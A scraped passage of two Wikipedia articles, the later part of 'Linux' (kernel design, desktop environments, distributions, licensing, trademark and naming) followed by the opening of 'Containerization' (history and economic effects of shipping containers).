kernel modules and user applications and libraries. Linux vendors and communities combine and distribute the kernel, GNU components, and non-GNU components, with additionalpackage managementsoftware in the form of Linux distributions. Many developers ofopen-sourcesoftware agree that the Linux kernel was not designed but ratherevolvedthroughnatural selection. Torvalds considers that although the design of Unix served as a scaffolding, "Linux grew with a lot of mutations – and because the mutations were less than random, they were faster and more directed thanalpha-particles in DNA."[90]Eric S. Raymondconsiders Linux's revolutionary aspects to be social, not technical: before Linux, complex software was designed carefully by small groups, but "Linux evolved in a completely different way. From nearly the beginning, it was rather casually hacked on by huge numbers of volunteers coordinating only through the Internet. Quality was maintained not by rigid standards or autocracy but by the naively simple strategy of releasing every week and getting feedback from hundreds of users within days, creating a sort of rapid Darwinian selection on the mutations introduced by developers."[91]Bryan Cantrill, an engineer of a competing OS, agrees that "Linux wasn't designed, it evolved", but considers this to be a limitation, proposing that some features, especially those related to security,[92]cannot be evolved into, "this is not a biological system at the end of the day, it's a software system."[93] A Linux-based system is a modular Unix-like operating system, deriving much of its basic design from principles established in Unix during the 1970s and 1980s. Such a system uses amonolithic kernel, the Linux kernel, which handles process control, networking, access to theperipherals, andfile systems.Device driversare either integrated directly with the kernel or added as modules that are loaded while the system is running.[94] The GNUuserlandis a key part of most systems based on the Linux kernel, with Android being the notable exception. TheGNU C library, an implementation of theC standard library, works as a wrapper for the system calls of the Linux kernel necessary to the kernel-userspace interface, thetoolchainis a broad collection of programming tools vital to Linux development (including thecompilersused to build the Linux kernel itself), and thecoreutilsimplement many basicUnix tools. The GNU Project also developsBash, a popularCLIshell. Thegraphical user interface(or GUI) used by most Linux systems is built on top of an implementation of theX Window System.[95]More recently, some of the Linux community has sought to move to usingWaylandas the display server protocol, replacing X11.[96][97] Many other open-source software projects contribute to Linux systems. Installed components of a Linux system include the following:[95][99] Theuser interface, also known as theshell, is either a command-line interface (CLI), a graphical user interface (GUI), or controls attached to the associated hardware, which is common for embedded systems. For desktop systems, the default user interface is usually graphical, although the CLI is commonly available throughterminal emulatorwindows or on a separatevirtual console. CLI shells are text-based user interfaces, which use text for both input and output. The dominant shell used in Linux is theBourne-Again Shell(bash), originally developed for the GNU Project;other shellssuch asZshare also used.[100][101]Most low-level Linux components, including various parts of theuserland, use the CLI exclusively. The CLI is particularly suited for automation of repetitive or delayed tasks and provides very simpleinter-process communication. On desktop systems, the most popular user interfaces are theGUI shells, packaged together with extensivedesktop environments, such asKDE Plasma,GNOME,MATE,Cinnamon,LXDE,Pantheon, andXfce, though a variety of additional user interfaces exist. Most popular user interfaces are based on the X Window System, often simply called "X" or "X11". It providesnetwork transparencyand permits a graphical application running on one system to be displayed on another where a user may interact with the application; however, certain extensions of the X Window System are not capable of working over the network.[102]Several X display servers exist, with the reference implementation,X.Org Server, being the most popular. Several types ofwindow managersexist for X11, includingtiling,dynamic,stacking, andcompositing. Window managers provide means to control the placement and appearance of individual application windows, and interact with the X Window System. SimplerX window managerssuch asdwm,ratpoison, ori3wmprovide aminimalistfunctionality, while more elaborate window managers such asFVWM,Enlightenment, orWindow Makerprovide more features such as a built-intaskbarandthemes, but are still lightweight when compared to desktop environments. Desktop environments include window managers as part of their standard installations, such asMutter(GNOME),KWin(KDE), orXfwm(xfce), although users may choose to use a different window manager if preferred. Wayland is a display server protocol intended as a replacement for the X11 protocol; as of 2022[update], it has received relatively wide adoption.[103]Unlike X11, Wayland does not need an external window manager and compositing manager. Therefore, a Wayland compositor takes the role of the display server, window manager, and compositing manager. Weston is the reference implementation of Wayland, while GNOME's Mutter and KDE's KWin are being ported to Wayland as standalone display servers. Enlightenment has already been successfully ported since version 19.[104]Additionally, many window managers have been made for Wayland, such as Sway or Hyprland, as well as other graphical utilities such as Waybar or Rofi. Linux currently has two modern kernel-userspace APIs for handling video input devices:V4L2API for video streams and radio, andDVBAPI for digital TV reception.[105] Due to the complexity and diversity of different devices, and due to the large number of formats and standards handled by those APIs, this infrastructure needs to evolve to better fit other devices. Also, a good userspace device library is the key to the success of having userspace applications to be able to work with all formats supported by those devices.[106][107] The primary difference between Linux and many other popular contemporary operating systems is that the Linux kernel and other components are free and open-source software. Linux is not the only such operating system, although it is by far the most widely used.[108]Somefreeandopen-source software licensesare based on the principle ofcopyleft, a kind of reciprocity: any work derived from a copyleft piece of software must also be copyleft itself. The most common free software license, the GNU General Public License (GPL), is a form of copyleft and is used for the Linux kernel and many of the components from the GNU Project.[109] Linux-based distributions are intended by developers forinteroperabilitywith other operating systems and established computing standards. Linux systems adhere to POSIX,[110]Single UNIX Specification(SUS),[111]Linux Standard Base(LSB),ISO, andANSIstandards where possible, although to date only one Linux distribution has been POSIX.1 certified, Linux-FT.[112][113]The Open Grouphas tested and certified at least two Linux distributions as qualifying for the Unix trademark,EulerOSandInspur K-UX.[114] Free software projects, although developed throughcollaboration, are often produced independently of each other. The fact that the software licenses explicitly permit redistribution, however, provides a basis for larger-scale projects that collect the software produced by stand-alone projects and make it available all at once in the form of a Linux distribution. Many Linux distributions manage a remote collection of system software and application software packages available for download and installation through a network connection. This allows users to adapt the operating system to their specific needs. Distributions are maintained by individuals, loose-knit teams, volunteer organizations, and commercial entities. A distribution is responsible for the default configuration of the installed Linux kernel, general system security, and more generally integration of the different software packages into a coherent whole. Distributions typically use a package manager such asapt,yum,zypper,pacmanorportageto install, remove, and update all of a system's software from one central location.[115] A distribution is largely driven by its developer and user communities. Some vendors develop and fund their distributions on a volunteer basis,Debianbeing a well-known example. Others maintain a community version of their commercial distributions, asRed Hatdoes withFedora, andSUSEdoes withopenSUSE.[116][117] In many cities and regions, local associations known asLinux User Groups(LUGs) seek to promote their preferred distribution and by extension free software. They hold meetings and provide free demonstrations, training, technical support, and operating system installation to new users. Many Internet communities also provide support to Linux users and developers. Most distributions and free software / open-source projects haveIRCchatrooms ornewsgroups.Online forumsare another means of support, with notable examples beingUnix & Linux Stack Exchange,[118][119]LinuxQuestions.organd the various distribution-specific support and community forums, such as ones forUbuntu, Fedora,Arch Linux,Gentoo, etc. Linux distributions hostmailing lists; commonly there will be a specific topic such as usage or development for a given list. There are several technology websites with a Linux focus. Print magazines on Linux often bundlecover disksthat carry software or even complete Linux distributions.[120][121] Although Linux distributions are generally available without charge, several large corporations sell, support, and contribute to the development of the components of the system and free software. An analysis of the Linux kernel in 2017 showed that well over 85% of the code was developed by programmers who are being paid for their work, leaving about 8.2% to unpaid developers and 4.1% unclassified.[122]Some of the major corporations that provide contributions includeIntel,Samsung,Google,AMD,Oracle, andFacebook.[122]Several corporations, notably Red Hat,Canonical, andSUSEhave built a significant business around Linux distributions. Thefree software licenses, on which the various software packages of a distribution built on the Linux kernel are based, explicitly accommodate and encourage commercialization; the relationship between a Linux distribution as a whole and individual vendors may be seen assymbiotic. One commonbusiness modelof commercial suppliers is charging for support, especially for business users. A number of companies also offer a specialized business version of their distribution, which adds proprietary support packages and tools to administer higher numbers of installations or to simplify administrative tasks.[123] Another business model is to give away the software to sell hardware. This used to be the norm in the computer industry, with operating systems such asCP/M,Apple DOS, and versions of theclassic Mac OSbefore 7.6 freely copyable (but not modifiable). As computer hardware standardized throughout the 1980s, it became more difficult for hardware manufacturers to profit from this tactic, as the OS would run on any manufacturer's computer that shared the same architecture.[124][125] Mostprogramming languagessupport Linux either directly or through third-party community basedports.[126]The original development tools used for building both Linux applications and operating system programs are found within theGNU toolchain, which includes theGNU Compiler Collection(GCC) and theGNU Build System. Amongst others, GCC provides compilers forAda,C,C++,GoandFortran. Many programming languages have a cross-platform reference implementation that supports Linux, for examplePHP,Perl,Ruby,Python,Java,Go,RustandHaskell. First released in 2003, theLLVMproject provides an alternative cross-platform open-source compiler for many languages.Proprietarycompilers for Linux include theIntel C++ Compiler,Sun Studio, andIBM XL C/C++ Compiler.BASICis available inproceduralform fromQB64,PureBasic,Yabasic,GLBasic,Basic4GL,XBasic,wxBasic,SdlBasic, andBasic-256, as well asobject orientedthroughGambas,FreeBASIC, B4X,Basic for Qt, Phoenix Object Basic,NS Basic, ProvideX,Chipmunk Basic,RapidQandXojo.Pascalis implemented throughGNU Pascal,Free Pascal, andVirtual Pascal, as well as graphically viaLazarus,PascalABC.NET, orDelphiusingFireMonkey(previously throughBorland Kylix).[127][128] A common feature of Unix-like systems, Linux includes traditional specific-purpose programming languages targeted atscripting, text processing and system configuration and management in general. Linux distributions supportshell scripts,awk,sedandmake. Many programs also have an embedded programming language to support configuring or programming themselves. For example,regular expressionsare supported in programs likegrepandlocate, the traditional Unix message transfer agentSendmailcontains its ownTuring completescripting system, and the advanced text editorGNU Emacsis built around a general purposeLispinterpreter.[129][130][131] Most distributions also include support forPHP,Perl,Ruby,Pythonand otherdynamic languages. While not as common, Linux also supportsC#and otherCLIlanguages(viaMono),Vala, andScheme.Guile Schemeacts as anextension languagetargeting the GNU system utilities, seeking to make the conventionally small,static, compiled C programs ofUnix designrapidly and dynamically extensible via an elegant,functionalhigh-level scripting system; many GNU programs can be compiled with optional Guilebindingsto this end. A number ofJava virtual machinesand development kits run on Linux, including the original Sun Microsystems JVM (HotSpot), and IBM's J2SE RE, as well as many open-source projects likeKaffeandJikes RVM;Kotlin,Scala,Groovyand otherJVM languagesare also available. GNOMEandKDEare popular desktop environments and provide a framework for developing applications. These projects are based on theGTKandQtwidget toolkits, respectively, which can also be used independently of the larger framework. Both support a wide variety of languages. There area numberofIntegrated development environmentsavailable includingAnjuta,Code::Blocks,CodeLite,Eclipse,Geany,ActiveState Komodo,KDevelop,Lazarus,MonoDevelop,NetBeans, andQt Creator, while the long-established editorsVim,nanoandEmacsremain popular.[132] The Linux kernel is a widely ported operating system kernel, available for devices ranging from mobile phones to supercomputers; it runs on a highly diverse range ofcomputer architectures, includingARM-based Android smartphones and theIBM Zmainframes. Specialized distributions and kernel forks exist for less mainstream architectures; for example, theELKSkernelforkcan run onIntel 8086orIntel 8028616-bit microprocessors,[133]while theμClinuxkernel fork may run on systems without amemory management unit.[134]The kernel also runs on architectures that were only ever intended to use a proprietary manufacturer-created operating system, such asMacintoshcomputers[135][136](withPowerPC,Intel, andApple siliconprocessors),PDAs,video game consoles,portable music players, and mobile phones. Linux has a reputation for supporting old hardware very well by maintaining standardized drivers for a long time.[137]There are several industry associations and hardwareconferencesdevoted to maintaining and improving support for diverse hardware under Linux, such asFreedomHEC. Over time, support for different hardware has improved in Linux, resulting in any off-the-shelf purchase having a "good chance" of being compatible.[138] In 2014, a new initiative was launched to automatically collect a database of all tested hardware configurations.[139] Many quantitative studies of free/open-source software focus on topics including market share and reliability, with numerous studies specifically examining Linux.[140]The Linux market is growing, and the Linux operating system market size is expected to see a growth of 19.2% by 2027, reaching $15.64 billion, compared to $3.89 billion in 2019.[141]Analysts project a Compound Annual Growth Rate (CAGR) of 13.7% between 2024 and 2032, culminating in a market size of US$34.90 billion by the latter year.[citation needed]Analysts and proponents attribute the relative success of Linux to its security, reliability, low cost, and freedom fromvendor lock-in.[142][143] As of 2024, estimates suggest Linux accounts for at least 80% of the public cloud workload, partly thanks to its widespread use in platforms like Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform.[150][151][152] ZDNet report that 96.3% of the top one million web servers are running Linux.[153][154]W3Techs state that Linux powers at least 39.2% of websites whose operating system is known, with other estimates saying 55%.[155][156] The Linux kernel islicensedunder the GNU General Public License (GPL), version 2. The GPL requires that anyone who distributes software based on source code under this license must make the originating source code (and any modifications) available to the recipient under the same terms.[172]Other key components of a typical Linux distribution are also mainly licensed under the GPL, but they may use other licenses; many libraries use theGNU Lesser General Public License(LGPL), a more permissive variant of the GPL, and theX.Orgimplementation of the X Window System uses theMIT License. Torvalds states that the Linux kernel will not move from version 2 of the GPL to version 3.[173][174]He specifically dislikes some provisions in the new license which prohibit the use of the software indigital rights management.[175]It would also be impractical to obtain permission from all the copyright holders, who number in the thousands.[176] A 2001 study ofRed Hat Linux7.1 found that this distribution contained 30 millionsource lines of code.[177]Using theConstructive Cost Model, the study estimated that this distribution required about eight thousand person-years of development time. According to the study, if all this software had been developed by conventional proprietary means, it would have cost aboutUS$1.82 billion[178]to develop in 2023 in the United States.[177]Most of the source code (71%) was written in the C programming language, but many other languages were used, includingC++,Lisp, assembly language, Perl, Python,Fortran, and variousshell scriptinglanguages. Slightly over half of all lines of code were licensed under the GPL. The Linux kernel itself was 2.4 million lines of code, or 8% of the total.[177] In a later study, the same analysis was performed for Debian version 4.0 (etch, which was released in 2007).[179]This distribution contained close to 283 million source lines of code, and the study estimated that it would have required about seventy three thousand man-years and costUS$10.2 billion[178](in 2023 dollars) to develop by conventional means. In the United States, the nameLinuxis a trademark registered to Linus Torvalds.[14]Initially, nobody registered it. However, on August 15, 1994, William R. Della Croce Jr. filed for the trademarkLinux, and then demanded royalties from Linux distributors. In 1996, Torvalds and some affected organizations sued him to have the trademark assigned to Torvalds, and, in 1997, the case was settled.[181]The licensing of the trademark has since been handled by theLinux Mark Institute(LMI). Torvalds has stated that he trademarked the name only to prevent someone else from using it. LMI originally charged a nominal sublicensing fee for use of the Linux name as part of trademarks,[182]but later changed this in favor of offering a free, perpetual worldwide sublicense.[183] The Free Software Foundation (FSF) prefersGNU/Linuxas the name when referring to the operating system as a whole, because it considers Linux distributions to bevariantsof the GNU operating system initiated in 1983 byRichard Stallman, president of the FSF.[28][29]The foundation explicitly takes no issue over the name Android for the Android OS, which is also an operating system based on the Linux kernel, as GNU is not a part of it. A minority of public figures and software projects other than Stallman and the FSF, notably distributions consisting of only free software, such as Debian (which had been sponsored by the FSF up to 1996),[184]also useGNU/Linuxwhen referring to the operating system as a whole.[185][186][187]Most media and common usage, however, refers to this family of operating systems simply asLinux, as do many large Linux distributions (for example,SUSE LinuxandRed Hat Enterprise Linux). As of May 2011[update], about 8% to 13% of thelines of codeof the Linux distribution Ubuntu (version "Natty") is made of GNU components (the range depending on whether GNOME is considered part of GNU); meanwhile, 6% is taken by the Linux kernel, increased to 9% when including its direct dependencies.[188]
https://en.wikipedia.org/wiki/Linux
Containerizationis a system ofintermodal freight transportusingintermodal containers(also calledshipping containers, orISOcontainers).[1]Containerization, also referred ascontainer stuffingorcontainer loading, is the process of unitization of cargoes in exports. Containerization is the predominant form of unitization of export cargoes today, as opposed to other systems such as the barge system or palletization.[2]The containers havestandardizeddimensions. They can be loaded and unloaded, stacked, transported efficiently over long distances, and transferred from onemode of transportto another—container ships,rail transportflatcars, andsemi-trailer trucks—without being opened. The handling system is mechanized so that all handling is done with cranes[3]and specialforklifttrucks. All containers are numbered and tracked using computerized systems. Containerization originated several centuries ago but was not well developed or widely applied until afterWorld War II, when it dramatically reduced the costs of transport, supported the post-war boom ininternational trade, and was a major element inglobalization. Containerization eliminated manual sorting of most shipments and the need for dock front warehouses, while displacing many thousands of dock workers who formerly simply handledbreak bulk cargo. Containerization reduced congestion in ports, significantly shortened shipping time, and reduced losses from damage and theft.[4] Containers can be made from a wide range of materials such as steel, fibre-reinforced polymer, aluminum or a combination. Containers made fromweathering steelare used to minimizemaintenance needs. Before containerization, goods were usually handled manually asbreak bulk cargo. Typically, goods would be loaded onto a vehicle from the factory and taken to a port warehouse where they would be offloaded and stored awaiting the next vessel. When the vessel arrived, they would be moved to the side of the ship along with other cargo to be lowered or carried into the hold and packed by dock workers. The ship might call at several other ports before off-loading a given consignment of cargo. Each port visit would delay the delivery of other cargo. Delivered cargo might then have been offloaded into another warehouse before being picked up and delivered to its destination. Multiple handling and delays made transport costly, time-consuming and unreliable.[4] Containerization has its origins in earlycoal mining regions in Englandbeginning in the late 18th century. In 1766James Brindleydesigned the "starvationer" box boat with ten wooden containers, to transport coal fromWorsleyDelph (quarry) to Manchester byBridgewater Canal. In 1795,Benjamin Outramopened theLittle Eaton Gangway, upon which coal was carried inwagonsbuilt at his Butterley Ironwork. The horse-drawn wheeled wagons on the gangway took the form of containers, which, loaded with coal, could be transshipped from canalbargeson theDerby Canal, which Outram had also promoted.[5] By the 1830s, railroads were carrying containers that could be transferred to other modes of transport. TheLiverpool and Manchester Railwayin the UK was one of these, making use of "simple rectangular timber boxes" to convey coal from Lancashire collieries to Liverpool, where a crane transferred them to horse-drawn carriages.[6]Originally used for moving coal on and off barges, "loose boxes" were used to containerize coal from the late 1780s, at places like theBridgewater Canal. By the 1840s, iron boxes were in use as well as wooden ones. The early 1900s saw the adoption of closed container boxes designed for movement between road and rail. On 17 May 1917,Louisville, Kentucky, native[7]Benjamin Franklin "B. F." Fitch (1877–1956)[8]launched commercial use of "demountable bodies" inCincinnati, Ohio, which he had designed as transferable containers. In 1919, his system was extended to over 200 containers serving 21 railway stations with 14 freight trucks.[9] In 1919,engineerStanisław Rodowicz developed the first draft of the container system inPoland. In 1920, he built a prototype of the biaxial wagon. ThePolish-Bolshevik Warstopped development of the container system in Poland.[10] The U.S. Post Office contracted with theNew York Central Railroadto move mail via containers in May 1921. In 1930, theChicago & Northwestern Railroadbegan shipping containers between Chicago and Milwaukee. Their efforts ended in the spring of 1931 when theInterstate Commerce Commissiondisallowed the use of a flat rate for the containers.[11] In 1926, a regular connection of the luxury passenger train from London to Paris,Golden Arrow/Fleche d'Or, bySouthern RailwayandFrench Northern Railway, began. For transport of passengers' baggage four containers were used. These containers were loaded in London or Paris and carried to ports, Dover or Calais, on flat cars in the UK and "CIWL Pullman Golden Arrow Fourgon of CIWL" in France. At the Second World Motor Transport Congress in Rome, September 1928, Italian senatorSilvio Crespiproposed the use of containers for road and railway transport systems, using collaboration rather than competition. This would be done under the auspices of an international organ similar to the Sleeping Car Company, which provided international carriage of passengers in sleeping wagons. In 1928Pennsylvania Railroad(PRR) started regular container service in the northeast U.S. After theWall Street crash of 1929inNew Yorkand the subsequent Great Depression, many countries were without any means to transport cargo. The railroads were sought as a possibility to transport cargo, and there was an opportunity to bring containers into broader use. In February 1931 the first container ship was launched. It was called the Autocarrier, owned by Southern Railway UK. It had 21 slots for containers of Southern Railway.[12][13]Under auspices of the International Chamber of Commerce in Paris inVeniceon September 30, 1931, on one of the platforms of the Maritime Station (Mole di Ponente), practical tests assessed the best construction for European containers as part of an international competition.[14] In 1931, in the U.S., B. F. Fitch designed the two largest and heaviest containers in existence. One measured 17 ft 6 in (5.33 m) by 8 ft 0 in (2.44 m) by 8 ft 0 in (2.44 m) with a capacity of 30,000 pounds (14,000 kg) in 890 cubic feet (25 m3), and a second measured 20 ft 0 in (6.10 m) by 8 ft 0 in (2.44 m) by 8 ft 0 in (2.44 m), with a capacity of 50,000 pounds (23,000 kg) in 1,000 cubic feet (28 m3).[15] In November 1932, inEnola, Pennsylvania, the firstcontainer terminalin the world was opened by thePennsylvania Railroad.[14]The Fitch hooking system was used for reloading of the containers.[15] The development of containerization was created in Europe and the U.S. as a way to revitalize rail companies after theWall Street crash of 1929, which had caused economic collapse and reduction in use of all modes of transport.[14] In 1933 in Europe, under the auspices of the International Chamber of Commerce, theInternational Container Bureau(French:Bureau International des Conteneurs, B.I.C.) was established. In June 1933, the B.I.C. decided on obligatory parameters for containers used in international traffic. Containers handled by means of lifting gear, such as cranes, overhead conveyors, etc. for traveling elevators (group I containers), constructed after July 1, 1933. Obligatory Regulations: In April 1935 BIC established a second standard for European containers:[14] From 1926 to 1947 in the U.S., theChicago North Shore and Milwaukee Railwaycarried motor carrier vehicles and shippers' vehicles loaded onflatcarsbetween Milwaukee, Wisconsin, and Chicago, Illinois. Beginning in 1929,Seatrain Linescarried railroad boxcars on its sea vessels to transport goods between New York and Cuba.[16] In the mid-1930s, theChicago Great Western Railwayand then theNew Haven Railroadbegan "piggyback" service (transporting highway freight trailers on flatcars) limited to their own railroads. The Chicago Great Western Railway filed a U.S. patent in 1938 on their method of securing trailers to a flatcars using chains and turnbuckles. Other components included wheel chocks and ramps for loading and unloading the trailers from the flatcars.[17]By 1953, theChicago, Burlington and Quincy, theChicago and Eastern Illinois, and theSouthern Pacificrailroads had joined the innovation. Most of the rail cars used were surplus flatcars equipped with new decks. By 1955, an additional 25 railroads had begun some form of piggyback trailer service. During World War II, theAustralian Armyused containers to more easily deal with variousbreaks of gaugein the railroads. These non-stackable containers were about the size of the later20-foot ISO containerand perhaps made mainly of wood.[18][need quotation to verify] During the same time, theUnited States Armystarted to combine items of uniform size, lashing them onto a pallet,unitizingcargo to speed the loading and unloading of transport ships. In 1947 theTransportation Corpsdeveloped theTransporter, a rigid, corrugated steel container with a 9,000 lb (4,100 kg) carrying capacity, for shipping household goods of officers in the field. It was 8 ft 6 in (2.59 m) long, 6 ft 3 in (1.91 m), and 6 ft 10 in (2.08 m) high, with double doors on one end, mounted on skids, and had lifting rings on the top four corners.[19][20]During theKorean Warthe Transporter was evaluated for handling sensitive military equipment and, proving effective, was approved for broader use. Theft of material and damage towoodencrates convinced the army that steel containers were needed. In April 1951, atZürich Tiefenbrunnen railway station, the Swiss Museum of Transport andBureau International des Containers(BIC) held demonstrations of container systems, with the aim of selecting the best solution for Western Europe. Present were representatives from France, Belgium, the Netherlands, Germany, Switzerland, Sweden, Great Britain, Italy and the United States. The system chosen for Western Europe was based on the Netherlands' system for consumer goods and waste transportation calledLaadkisten(literally, "loading bins"), in use since 1934. This system usedroller containersthat were moved by rail, truck and ship, in various configurations up to a capacity of 5,500 kg (12,100 lb), and up to3.1 by 2.3 by 2 metres (10 ft 2 in × 7 ft6+1⁄2in × 6 ft6+3⁄4in) size.[21][22]This became the first post World War II European railway standardUIC590, known as "pa-Behälter." It was implemented in the Netherlands, Belgium, Luxembourg, West Germany, Switzerland, Sweden and Denmark.[23]With the popularization of the larger ISO containers, support for pa containers was phased out by the railways. In the 1970s they began to be widely used for transporting waste.[23] In 1952 the U.S. Army developed the Transporter into the CONtainer EXpress orCONEX boxsystem. The size and capacity of the CONEXes were about the same as the Transporter,[nb 1]but the system was mademodular, by the addition of a smaller, half-size unit of 6 ft 3 in (1.91 m) long, 4 ft 3 in (1.30 m) wide and6 ft10+1⁄2in (2.10 m) high.[26][27][nb 2]CONEXes could be stacked three high, and protected their contents from the elements.[24] The first major shipment of CONEXes, containing engineering supplies and spare parts, was made by rail from the Columbus General Depot in Georgia to thePort of San Francisco, then by ship to Yokohama, Japan, and then to Korea, in late 1952. Transit times were almost halved. By the time of theVietnam Warthe majority of supplies and materials were shipped by CONEX. By 1965 the U.S. military used some 100,000 CONEX boxes, and more than 200,000 in 1967.[27][31]making this the first worldwide application of intermodal containers.[24]After theUS Department of Defensestandardized an 8-by-8-foot (2.44 by 2.44 m) cross section container in multiples of 10-foot (3.05 m) lengths for military use, it was rapidly adopted for shipping purposes.[citation needed] In 1955, former trucking company ownerMalcom McLeanworked with engineerKeith Tantlingerto develop the modernintermodal container.[32]All the containerization pioneers who came before McLean had thought in terms of optimizing particular modes of transport. McLean's "fundamental insight" which made the intermodal container possible was that the core business of the shipping industry "was moving cargo, not sailing ships".[33]He visualized and helped to bring about a world reoriented around that insight, which required not just standardization of the metal containers themselves, but drastic changes toeveryaspect of cargo handling.[33] In 1955, McLean and Tantlinger's immediate challenge was to design ashipping containerthat could efficiently be loaded onto ships and would hold securely on sea voyages. The result was an 8 feet (2.44 m) tall by 8 ft (2.44 m) wide box in 10 ft (3.05 m)-long units constructed from2.5 mm (13⁄128in) thick corrugated steel. The design incorporated atwistlockmechanism atop each of the four corners, allowing the container to beeasily secured and liftedusing cranes. Several years later, as aFruehaufexecutive, Tantlinger went back to McLean and convinced him to relinquish control of their design to help stimulate the container revolution. On January 29, 1963, McLean's companySeaLandreleased its patent rights, so that Tantlinger's inventions could become "the basis for a standard corner fitting and twist lock".[34]Tantlinger was deeply involved in the debates and negotiations which in back-to-back votes in September 1965 (on September 16 and 24, respectively) led to the adoption of a modified version of the Sea-Land design as the American and then the international standard for corner fittings for shipping containers.[35]This began international standardization of shipping containers.[36] The first vessels purpose-built to carry containers had begun operation in 1926 for the regular connection of the luxury passenger train between London and Paris, theGolden Arrow/Fleche d'Or. Four containers were used for the conveyance of passengers' baggage. These containers were loaded in London or Paris and carried to the ports of Dover or Calais.[14]In February 1931 the first container ship in the world was launched. It was called the Autocarrier, owned by the UK's Southern Railway. It had 21 slots for containers of Southern Railway.[12][13] The next step was in Europe after World War II. Vessels purpose-built to carry containers were used between UK and Netherlands[23]and also in Denmark in 1951.[37]In the United States, ships began carrying containers in 1951, betweenSeattle, Washington, and Alaska.[38]None of these services was particularly successful. First, the containers were rather small, with 52% of them having a volume of less than 3 cubic metres (106 cu ft). Almost all European containers were made of wood and used canvas lids, and they required additional equipment for loading into rail or truck bodies.[39] The world's first purpose-built container vessel wasClifford J. Rodgers,[40]built in Montreal in 1955 and owned by theWhite Pass and Yukon Corporation.[41]Her first trip carried 600 containers between North Vancouver, British Columbia, and Skagway, Alaska, on November 26, 1955. In Skagway, the containers were unloaded to purpose-builtrailroad carsfor transport north to Yukon, in the firstintermodalservice using trucks, ships, and railroad cars.[42]Southbound containers were loaded by shippers in Yukon and moved by rail, ship, and truck to their consignees without opening. This first intermodal system operated from November 1955 until 1982.[43] The first truly successful container shipping company dates to April 26, 1956, when American trucking entrepreneur McLean put 58trailer vans[44]later called containers, aboard a refitted tanker ship, theSSIdeal X, and sailed them fromNewark, New Jersey, toHouston, Texas.[45]Independently of the events in Canada, McLean had the idea of using large containers that never opened in transit and that were transferable on an intermodal basis, among trucks, ships, and railroad cars. McLean had initially favored the construction of "trailerships"—taking trailers from large trucks and stowing them in a ship'scargohold. This method of stowage, referred to asroll-on/roll-off, was not adopted because of the large waste in potential cargo space on board the vessel, known as brokenstowage. Instead, McLean modified his original concept into loading just the containers, not the chassis, onto the ship; hence the designation "container ship" or "box" ship.[46][4](See alsopantechnicon vanandtrolley and lift van.) During the first 20 years of containerization, many container sizes and corner fittings were used. There were dozens of incompatible container systems in the US alone. Among the biggest operators, theMatson Navigation Companyhad a fleet of 24-foot (7.32 m) containers, whileSea-Land Service, Incused 35-foot (10.67 m) containers. The standard sizes and fitting and reinforcement norms that now exist evolved out of a lengthy and complex series of compromises among international shipping companies, European railroads, US railroads, and US trucking companies. Everyone had to sacrifice something. For example, to McLean's frustration, Sea-Land's 35-foot container was not adopted as one of the standard container sizes.[34]In the end, four important ISO (International Organization for Standardization) recommendations standardized containerization globally:[47] Based on these standards, the firstTEUcontainer ship was the JapaneseHakone Maru[de;jp]from shipowner NYK, which started sailing in 1968 and could carry 752 TEU containers. In the US, containerization and other advances in shipping were impeded by theInterstate Commerce Commission(ICC), which was created in 1887 to keep railroads from using monopolist pricing and rate discrimination, but fell victim toregulatory capture. By the 1960s, ICC approval was required before any shipper could carry different items in the same vehicle or change rates. The fully integrated systems in the US today became possible only after the ICC's regulatory oversight was cut back (and abolished in 1995). Trucking and rail were deregulated in the 1970s and maritime rates were deregulated in 1984.[48] Double-stacked rail transport, where containers are stacked two high on railway cars, was introduced in the US. The concept was developed by Sea-Land and the Southern Pacific railroad. The first standalone double-stack container car (or single-unit 40-foot (12.2 m) COFC well car) was delivered in July 1977. The five-unit well car, the industry standard, appeared in 1981. Initially, these double-stack railway cars were deployed in regular train service. Ever since American President Lines initiated in 1984 a dedicated double-stack container train service between Los Angeles and Chicago, transport volumes increased rapidly.[49] Containerization greatly reduced the expense ofinternational tradeand increased its speed, especially of consumer goods and commodities. It also dramatically changed the character of port cities worldwide. Prior to highly mechanized container transfers, crews of 20 to 22longshoremenwould pack individual cargoes into the hold of a ship. After containerization, large crews of longshoremen were not necessary at port facilities, and the profession changed drastically. Meanwhile, the port facilities needed to support containerization changed. One effect was the decline of some ports and the rise of others. At thePort of San Francisco, the former piers used for loading and unloading were no longer required, but there was little room to build the vast holding lots needed for storing and sorting containers in transit between different transport modes. As a result, the Port of San Francisco essentially ceased to function as a major commercial port, but the neighboringPort of Oaklandemerged as the second largest on the US West Coast. A similar fate occurred with the relationship between theports of Manhattan and New Jersey. In the UK, thePort of LondonandPort of Liverpooldeclined in importance. Meanwhile, Britain'sPort of FelixstoweandPort of Rotterdamin the Netherlands emerged as major ports. In general, containerization causedinland portson waterways incapable of receiving deep-draftship traffic to decline in favor ofseaports, which then built vast container terminals next to deep oceanfront harbors in lieu of the dockfront warehouses and finger piers that had formerly handled break bulk cargo. With intermodal containers, the jobs of packing, unpacking, and sorting cargoes could be performed far from the point of embarkation. Such work shifted to so-called "dry ports" and gigantic warehouses in rural inland towns, where land and labor were much cheaper than in oceanfront cities. This fundamental transformation of where warehouse work was performed freed up valuable waterfront real estate near thecentral business districtsof port cities around the world forredevelopmentand led to a plethora of waterfront revitalization projects (such aswarehouse districts).[50] The effects of containerization rapidly spread beyond the shipping industry. Containers were quickly adopted by trucking and rail transport industries for cargo transport not involving sea transport. Manufacturing also evolved to adapt to take advantage of containers. Companies that once sent small consignments began grouping them into containers. Many cargoes are now designed to precisely fit containers. The reliability of containers madejust in time manufacturingpossible as component suppliers could deliver specific components on regular fixed schedules. In 2004, global container traffic was 354 millionTEUs, of which 82 percent were handled by the world's top 100 container ports.[51] As of 2009[update], approximately 90% of non-bulk cargoworldwide is moved by containers stacked on transport ships;[52]26% of all containertransshipmentis carried out in China.[53]For example, in 2009 there were 105,976,701 transshipments in China (both international and coastal, excluding Hong Kong), 21,040,096 in Hong Kong (which is listed separately), and only 34,299,572 in the United States. In 2005, some 18 million containers made over 200 million trips per year. Some ships can carry over 14,500twenty-foot equivalent units(TEU), such as theEmma Mærsk, 396 m (1,299 ft) long, launched in August 2006. It has been predicted that, at some point, container ships will be constrained in size only by the depth of theStraits of Malacca, one of the world's busiest shipping lanes, linking the Indian Ocean to the Pacific Ocean. This so-calledMalaccamaxsize constrains a ship to dimensions of 470 m (1,542 ft) in length and 60 m (197 ft) wide.[4] Few foresaw the extent of the influence of containerization on theshipping industry. In the 1950s, Harvard University economistBenjamin Chinitzpredicted that containerization would benefit New York by allowing it to ship its industrial goods more cheaply to the Southern US than other areas, 